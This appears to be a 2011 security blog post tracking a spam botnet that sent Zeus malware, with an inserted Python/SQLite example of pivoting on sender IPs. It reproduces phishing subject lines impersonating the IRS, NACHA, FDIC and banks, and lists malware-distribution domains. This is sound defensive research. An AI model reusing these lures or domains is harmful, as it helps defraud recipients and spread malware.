1 | Payment rejected     | 2011-07-27 07:00:00
1 | Rejected transaction | 2011-07-27 06:45:00
4 | Canceled payment     | 2011-07-27 06:30:00
2 | Canceled transfer    | 2011-07-27 06:30:00
1 | Payment canceled     | 2011-07-27 06:30:00
1 | Payment rejected     | 2011-07-27 06:30:00
1 | Canceled transaction | 2011-07-27 06:15:00
1 | Canceled transfer    | 2011-07-27 06:15:00
1 | Payment canceled     | 2011-07-27 06:15:00
1 | Payment rejected     | 2011-07-27 06:15:00


taxes-refund.com

1 | Internal Revenue Service        | 2011-07-27 08:00:00
1 | U.S. Department of the Treasury | 2011-07-27 08:00:00
1 | Internal Revenue Service        | 2011-07-27 07:45:00
2 | Internal Revenue Service (IRS)  | 2011-07-27 07:45:00
2 | Payment IRS.gov                 | 2011-07-27 07:45:00
1 | Internal Revenue Service        | 2011-07-27 07:30:00
1 | IRS.gov                         | 2011-07-27 07:30:00
1 | U.S. Department of the Treasury | 2011-07-27 07:30:00


Three consecutive campaigns, one following the other, with the whole thing wrapping up before 8 AM Central time (which would be 9 AM Eastern time).

The NACHA spam leading to Zeus has been an issue for a very long time. We've seen spam like this as far back as November 2009, but it's been fairly constant since February of this year, when we shared the article ACH Transaction Rejected Payment Spam.

Following the Botnet Back in Time


Because of the way we archive our email, it's possible for us to ask the UAB Spam Data Mine to reveal a deeper history for this particular spamming botnet by asking a question like:

"Show me all the spam subjects that have been sent by IP addresses that sent me this morning's fdic-updates.com spam message"

5 | 2011-07-28 06:00:00 | ACH and Wire transfers disabled.
3 | 2011-07-28 06:00:00 | Banking security update.
1 | 2011-07-28 06:00:00 | Update for your banking account.
107 | 2011-07-28 05:45:00 | ACH and Wire transfers disabled.
138 | 2011-07-28 05:45:00 | Banking security update.
108 | 2011-07-28 05:45:00 | Security update for banking accounts.
122 | 2011-07-28 05:45:00 | Update for your banking account.
1 | 2011-07-28 05:30:00 | Banking security update.
1 | 2011-07-28 05:30:00 | Security update for banking accounts.
1 | 2011-07-28 05:15:00 | ACH and Wire transfers disabled.
1 | 2011-07-28 05:15:00 | Banking security update.
1 | 2011-07-28 05:15:00 | Security update for banking accounts.
1 | 2011-07-27 23:30:00 | ho
1 | 2011-07-27 21:15:00 | RE:.. How do you do,
4 | 2011-07-27 20:00:00 | ho
1 | 2011-07-27 14:45:00 | VIDEO: Lockerbie bomber at pro-Gaddafi rally
1 | 2011-07-27 12:00:00 | Yo
1 | 2011-07-27 08:00:00 | Internal Revenue Service
1 | 2011-07-27 06:45:00 | Rejected transaction
2 | 2011-07-27 05:15:00 | Rejected transaction
2 | 2011-07-27 05:00:00 | Canceled transaction
2 | 2011-07-27 05:00:00 | Canceled transfer
3 | 2011-07-27 05:00:00 | Payment rejected
33 | 2011-07-27 04:45:00 | Canceled payment
22 | 2011-07-27 04:45:00 | Canceled transaction
26 | 2011-07-27 04:45:00 | Canceled transfer
24 | 2011-07-27 04:45:00 | Payment canceled
30 | 2011-07-27 04:45:00 | Payment rejected
17 | 2011-07-27 04:45:00 | Rejected transaction
1 | 2011-07-27 04:30:00 | Payment canceled
1 | 2011-07-27 04:15:00 | Canceled transaction
1 | 2011-07-27 04:15:00 | Payment canceled
1 | 2011-07-26 17:15:00 | Attack on Guinea leader repelled
1 | 2011-07-26 06:00:00 | IRC.gov
1 | 2011-07-26 05:45:00 | VIDEO: Phoenix hit by second dust storm
1 | 2011-07-25 14:00:00 | Hi!
1 | 2011-07-23 19:45:00 | Giant space telescope reaches orbit
1 | 2011-07-23 19:45:00 | High Court challenge on care cuts
1 | 2011-07-23 19:45:00 | HMRC in cost-cutting 'challenge'
1 | 2011-07-23 19:45:00 | Mortgage lending remains subdued
1 | 2011-07-23 19:45:00 | Mum's stress reaches baby in womb
1 | 2011-07-23 19:45:00 | Nato hands over key Afghan city
1 | 2011-07-23 19:45:00 | Personal pension advice still bad
1 | 2011-07-23 19:45:00 | Scots economy escapes recession
1 | 2011-07-23 19:45:00 | Serbia arrests last war crimes fugitive
1 | 2011-07-23 19:45:00 | Strauss-Kahn daughter questioned
1 | 2011-07-23 19:45:00 | VIDEO: Key moments as MPs grill Murdochs
1 | 2011-07-23 18:30:00 | Heya
2 | 2011-07-22 19:45:00 | Hi
1 | 2011-07-22 19:00:00 | Hey
1 | 2011-07-22 19:00:00 | Hi
1 | 2011-07-22 13:45:00 | Heya
1 | 2011-07-22 07:15:00 | Read: A Must for High-Rise Emergencies
1 | 2011-07-22 05:00:00 | IRC.gov
1 | 2011-07-22 04:45:00 | Support IRS.gov
2 | 2011-07-22 03:45:00 | Change Confirmation
1 | 2011-07-22 03:45:00 | Does your enterprise including outstanding tax debts
1 | 2011-07-22 03:45:00 | Internal Revenue Service
1 | 2011-07-22 03:45:00 | Internal Revenue Service United States Department of the Treasury
1 | 2011-07-22 03:45:00 | IRC.gov
1 | 2011-07-22 03:45:00 | IRS.gov US
1 | 2011-07-22 03:45:00 | Notice of Underreported Income
3 | 2011-07-22 03:45:00 | Support IRS.gov
2 | 2011-07-22 03:45:00 | Treasury Inspector General for Tax Administration
2 | 2011-07-22 03:45:00 | U.S. Department of the Treasury
2 | 2011-07-22 03:45:00 | Your company including unpaid tax debts
1 | 2011-07-21 13:00:00 | Manhood raisers with price-offs!
1 | 2011-07-21 13:00:00 | Super lasting and good stiff!
1 | 2011-07-21 05:45:00 | New security update
2 | 2011-07-21 04:45:00 | Go id token update
6 | 2011-07-21 04:45:00 | Security token update
1 | 2011-07-21 04:45:00 | Token code update
2 | 2011-07-21 04:45:00 | Token software update
1 | 2011-07-20 07:30:00 | Canceled payment
1 | 2011-07-20 07:30:00 | Rejected transaction
1 | 2011-07-20 07:00:00 | Payment rejected
1 | 2011-07-20 06:45:00 | Canceled payment
1 | 2011-07-20 06:45:00 | Payment canceled
16 | 2011-07-20 06:30:00 | Canceled payment
8 | 2011-07-20 06:30:00 | Canceled transaction
10 | 2011-07-20 06:30:00 | Canceled transfer
7 | 2011-07-20 06:30:00 | Payment canceled
8 | 2011-07-20 06:30:00 | Payment rejected
6 | 2011-07-20 06:30:00 | Rejected transaction
19 | 2011-07-20 06:15:00 | Canceled payment
13 | 2011-07-20 06:15:00 | Canceled transaction
15 | 2011-07-20 06:15:00 | Canceled transfer
16 | 2011-07-20 06:15:00 | Payment canceled
17 | 2011-07-20 06:15:00 | Payment rejected
24 | 2011-07-20 06:15:00 | Rejected transaction
2 | 2011-07-20 05:00:00 | Wire transfer # 3240569823405844930
4 | 2011-07-20 05:00:00 | Wire transfer # 3463453123432454667
1 | 2011-07-20 05:00:00 | Wire transfer # 3858994783568734677
1 | 2011-07-20 05:00:00 | Wire transfer # 4577867895676542367
2 | 2011-07-20 05:00:00 | Wire transfer # 5645746324515345353
2 | 2011-07-20 05:00:00 | Wire transfer # 6754846773457536756
2 | 2011-07-20 05:00:00 | Wire transfer # 6785675623451222333
1 | 2011-07-20 05:00:00 | Wire transfer # 8565696735865742365
2 | 2011-07-20 05:00:00 | Wire transfer ID 2345578568567567544
1 | 2011-07-20 05:00:00 | Wire transfer ID 3265474356547356756
1 | 2011-07-20 05:00:00 | Wire transfer ID 3425215345565475468
1 | 2011-07-20 05:00:00 | Wire transfer id 3425233214234534634
5 | 2011-07-20 05:00:00 | Wire transfer ID 3425233214234534634
1 | 2011-07-20 05:00:00 | Wire transfer id 3452364365475463425
1 | 2011-07-20 05:00:00 | Wire transfer ID 4135146854351231151
1 | 2011-07-20 05:00:00 | Wire transfer ID 4353267658545629087
3 | 2011-07-20 05:00:00 | Wire transfer ID 5468513264769656536
1 | 2011-07-20 05:00:00 | Wire transfer id 5473785489567245623
1 | 2011-07-20 05:00:00 | Wire transfer ID 5687895416264572398
1 | 2011-07-20 05:00:00 | Wire transfer ID 5876978567345176586
1 | 2011-07-20 05:00:00 | Wire transfer ID 6768576565423453415
1 | 2011-07-20 05:00:00 | Wire transfer id 6857234568657433677
3 | 2011-07-20 05:00:00 | Wire transfer id 8479764976835672345
1 | 2011-07-20 05:00:00 | Wire transfer id 8658375686537546544
41 | 2011-07-20 05:00:00 | Your Wire fund transfer
1 | 2011-07-20 04:30:00 | Wire transfer ID 6431531354846843122
1 | 2011-07-19 04:45:00 | Change Confirmation
1 | 2011-07-19 04:45:00 | Does your company is registered outstanding tax debts
2 | 2011-07-19 04:45:00 | U.S. Department of the Treasury
1 | 2011-07-19 04:45:00 | Your IRS payment rejected
1 | 2011-07-19 04:30:00 | Change Confirmation
1 | 2011-07-19 04:30:00 | Does your company including tax debts
1 | 2011-07-19 04:30:00 | Does your enterprise listed unpaid tax debts
2 | 2011-07-19 04:30:00 | Federal Tax payment rejected
1 | 2011-07-19 04:30:00 | For your company including unpaid tax debt
1 | 2011-07-19 04:30:00 | For your enterprise including tax debt
13 | 2011-07-19 04:30:00 | Internal Revenue Service
4 | 2011-07-19 04:30:00 | Internal Revenue Service (IRS)
2 | 2011-07-19 04:30:00 | Internal Revenue Service United States Department of the Treasury
4 | 2011-07-19 04:30:00 | IRC.gov
5 | 2011-07-19 04:30:00 | IRS.gov US
8 | 2011-07-19 04:30:00 | Notice of Underreported Income
6 | 2011-07-19 04:30:00 | Payment IRS.gov
4 | 2011-07-19 04:30:00 | Support IRS.gov
5 | 2011-07-19 04:30:00 | Treasury Inspector General for Tax Administration
1 | 2011-07-19 04:30:00 | U.S. Department of the Treasury
2 | 2011-07-19 04:30:00 | Your enterprise has remained outstanding tax debts
3 | 2011-07-19 04:30:00 | Your IRS payment rejected
1 | 2011-07-19 04:15:00 | Internal Revenue Service
1 | 2011-07-18 10:30:00 | Love BlackJack? Check out the games at Winner Palace
1 | 2011-07-16 02:00:00 | Out of Office AutoReply: Please Review
1 | 2011-07-15 09:00:00 | For your company is registered unpaid tax debt
1 | 2011-07-15 09:00:00 | Internal Revenue Service
2 | 2011-07-15 08:45:00 | Change Confirmation
2 | 2011-07-15 08:45:00 | Federal Tax payment rejected
2 | 2011-07-15 08:45:00 | Internal Revenue Service
2 | 2011-07-15 08:45:00 | Internal Revenue Service (IRS)
4 | 2011-07-15 08:45:00 | Internal Revenue Service United States Department of the Treasury
3 | 2011-07-15 08:45:00 | IRC.gov
1 | 2011-07-15 08:45:00 | IRS.gov US
3 | 2011-07-15 08:45:00 | Payment IRS.gov
2 | 2011-07-15 08:45:00 | Support IRS.gov
1 | 2011-07-15 08:45:00 | Treasury Inspector General for Tax Administration
1 | 2011-07-15 08:45:00 | U.S. Department of the Treasury
2 | 2011-07-15 08:45:00 | Your IRS payment rejected
1 | 2011-07-15 07:30:00 | TV murder appeal prompts 40 calls
1 | 2011-07-14 21:30:00 | US senator requests hacking probe
1 | 2011-07-14 20:15:00 | Parties unite over BSkyB bid call
1 | 2011-07-14 19:45:00 | PM Kan urges 'nuclear-free Japan'
1 | 2011-07-14 18:00:00 | Man tells jury 'I killed Lynette'
1 | 2011-07-14 15:15:00 | VIDEO: Live: Debate on youth unemployment
1 | 2011-07-14 07:15:00 | Security update for banking accounts.
10 | 2011-07-14 07:00:00 | ACH and Wire transfers disabled.
5 | 2011-07-14 07:00:00 | Banking security update.
7 | 2011-07-14 07:00:00 | Security update for banking accounts.
5 | 2011-07-14 07:00:00 | Update for your banking account.
1 | 2011-07-13 11:30:00 | Hospitals warned over clot deaths
1 | 2011-07-13 07:45:00 | Does your enterprise listed unpaid tax debt
3 | 2011-07-13 07:45:00 | Federal Tax payment rejected
5 | 2011-07-13 07:45:00 | Internal Revenue Service United States Department of the Treasury
2 | 2011-07-13 07:45:00 | IRC.gov
7 | 2011-07-13 07:45:00 | Notice of Underreported Income
1 | 2011-07-13 07:45:00 | Treasury Inspector General for Tax Administration
2 | 2011-07-13 07:45:00 | U.S. Department of the Treasury
1 | 2011-07-13 07:45:00 | Your company listed outstanding tax debt
1 | 2011-07-13 07:45:00 | Your enterprise listed unpaid tax debt
1 | 2011-07-13 07:30:00 | Internal Revenue Service
2 | 2011-07-13 07:30:00 | Internal Revenue Service (IRS)
2 | 2011-07-13 07:30:00 | Internal Revenue Service United States Department of the Treasury
1 | 2011-07-13 07:30:00 | Notice of Underreported Income
3 | 2011-07-13 07:30:00 | Payment IRS.gov
1 | 2011-07-13 07:30:00 | Support IRS.gov
2 | 2011-07-13 07:30:00 | U.S. Department of the Treasury
2 | 2011-07-13 07:30:00 | Your IRS payment rejected
3 | 2011-07-13 05:45:00 | Business accounts updates
1 | 2011-07-13 05:45:00 | Dear corporate clients
1 | 2011-07-13 05:45:00 | New settings for wire transfers
1 | 2011-07-13 05:30:00 | Business accounts updates
5 | 2011-07-13 05:30:00 | Corporate banking security
3 | 2011-07-13 05:30:00 | Dear corporate clients
10 | 2011-07-13 05:30:00 | Federalreserve security update
4 | 2011-07-13 05:30:00 | New security settings
4 | 2011-07-13 05:30:00 | New security update
5 | 2011-07-13 05:30:00 | New settings for wire transfers
2 | 2011-07-13 05:30:00 | Wire transfers update



We can also ask it to tell us which spammed destinations those messages advertised; what we see is:

July 13th = usbanking-security.com
July 15th = federalsecusrity.com
July 19th = taxreport-irs.com
July 19th = irs-taxes-report.com
July 19th = irs-report-link.com
July 20th = www.federalreserve.gov
July 20th = reports-federalreserve.com
July 20th = nacha-alert.org
July 20th = nacha-alert.com
July 20th = alerts-federalresrve.com
July 21st = national-security-agency.com
July 21st = federal-secueity-government.com
July 22nd = irs-downloads.com
July 22nd = irs-files.com
July 26th = taxes-irs.net
July 27th = www.nacha-rejected.com
July 27th = taxes-refund.com
July 28th = fdic-updates.com

Again, the query run says "look at my spam history FOR THE IP ADDRESSES USED BY THE GOV-RELATED ZEUS DOMAIN THIS MORNING and see what else they've sent me previously."
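As an added illustration (not the Data Mine's own schema, code or data), here is that question written as SQL against a constructed SQLite archive: the sender-IP subquery that pivots from this morning's fdic-updates.com messages to everything those IPs ever sent, the 15-minute bucketing the count tables above use, and the per-day destination list. The table layout, column names and every sample row are assumptions; the sender IPs are documentation-range addresses, not the botnet's real senders.

```python
import sqlite3

# Constructed sample archive: one row per received message, with the sending IP,
# the receive time, the subject and the domain of the spammed link. All values are
# made up for illustration; IPs are documentation-range addresses (RFC 5737).
SAMPLE_MESSAGES = [
    # (sender_ip, received, subject, link_domain)
    ("192.0.2.10",   "2011-07-28 05:47:12", "Banking security update.",            "fdic-updates.com"),
    ("192.0.2.11",   "2011-07-28 05:49:30", "Banking security update.",            "fdic-updates.com"),
    ("192.0.2.10",   "2011-07-28 05:52:03", "ACH and Wire transfers disabled.",    "fdic-updates.com"),
    ("192.0.2.11",   "2011-07-28 05:58:40", "Update for your banking account.",    "fdic-updates.com"),
    ("192.0.2.11",   "2011-07-27 04:46:10", "Canceled payment",                    "nacha-rejected.com"),
    ("192.0.2.10",   "2011-07-27 04:49:55", "Rejected transaction",                "nacha-rejected.com"),
    ("192.0.2.11",   "2011-07-27 07:31:00", "Internal Revenue Service",            "taxes-refund.com"),
    ("192.0.2.10",   "2011-07-23 19:46:00", "Giant space telescope reaches orbit", None),
    # A sender that never linked to fdic-updates.com: the pivot must leave it out,
    # even though it sent the same subject in the same 15-minute block.
    ("198.51.100.7", "2011-07-28 05:46:00", "Banking security update.",            "usbanking-security.com"),
    ("198.51.100.7", "2011-07-27 04:47:00", "Canceled payment",                    "nacha-rejected.com"),
]

SCHEMA = """
CREATE TABLE messages (
    sender_ip   TEXT NOT NULL,
    received    TEXT NOT NULL,   -- 'YYYY-MM-DD HH:MM:SS', archive local time
    subject     TEXT NOT NULL,
    link_domain TEXT             -- NULL when the message carried no spammed link
);
"""

# SQLite has no date_trunc(); this expression floors a timestamp to the start of
# its 15-minute block, e.g. '2011-07-28 05:58:40' -> '2011-07-28 05:45:00'.
BUCKET_15MIN = (
    "strftime('%Y-%m-%d %H:', received) || "
    "printf('%02d', (CAST(strftime('%M', received) AS INTEGER) / 15) * 15) || ':00'"
)


def load_archive(rows=SAMPLE_MESSAGES):
    """Build an in-memory archive from (sender_ip, received, subject, link_domain) rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO messages VALUES (?, ?, ?, ?)", rows)
    return conn


def subjects_per_block(conn, link_domain, day):
    """Count per subject and 15-minute block for one spammed domain on one day
    (the shape of the 'count per 15 minute block' tables above)."""
    sql = f"""
        SELECT COUNT(*) AS n, subject, {BUCKET_15MIN} AS block
        FROM messages
        WHERE link_domain = ? AND date(received) = ?
        GROUP BY block, subject
        ORDER BY block DESC, subject
    """
    return conn.execute(sql, (link_domain, day)).fetchall()


def botnet_history(conn, link_domain, day):
    """Pivot on sender IP: every subject, with count and 15-minute block, ever sent
    by the IPs that delivered `link_domain` spam on `day`. The subquery is the
    'IP addresses that sent me this morning's spam' part of the question."""
    sql = f"""
        SELECT COUNT(*) AS n, {BUCKET_15MIN} AS block, subject
        FROM messages
        WHERE sender_ip IN (
            SELECT DISTINCT sender_ip
            FROM messages
            WHERE link_domain = ? AND date(received) = ?
        )
        GROUP BY block, subject
        ORDER BY block DESC, subject
    """
    return conn.execute(sql, (link_domain, day)).fetchall()


def campaign_domains_by_day(conn, link_domain, day):
    """Second step: which other spammed destinations those same IPs advertised,
    one (day, domain) pair per campaign, in the style of the dated list above."""
    sql = """
        SELECT date(received) AS day, link_domain
        FROM messages
        WHERE link_domain IS NOT NULL
          AND sender_ip IN (
            SELECT DISTINCT sender_ip FROM messages
            WHERE link_domain = ? AND date(received) = ?
          )
        GROUP BY day, link_domain
        ORDER BY day, link_domain
    """
    return conn.execute(sql, (link_domain, day)).fetchall()


if __name__ == "__main__":
    conn = load_archive()
    for n, block, subject in botnet_history(conn, "fdic-updates.com", "2011-07-28"):
        print(f"{n:3d} | {block} | {subject}")
    for day, domain in campaign_domains_by_day(conn, "fdic-updates.com", "2011-07-28"):
        print(f"{day} = {domain}")
```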

I've temporarily included only those links that were DIRECTLY linking to an executable, but we also have all of the "domain-shortener" spam that was sent on July 13th pretending to be a LinkedIn message. In that case, the spam used 25 different shortener services, most of which seem to have been created specifically for that purpose:


And yes, we can also tie today's spamming botnet to all of those fake LinkedIn spam messages that distributed Zeus on July 13th.
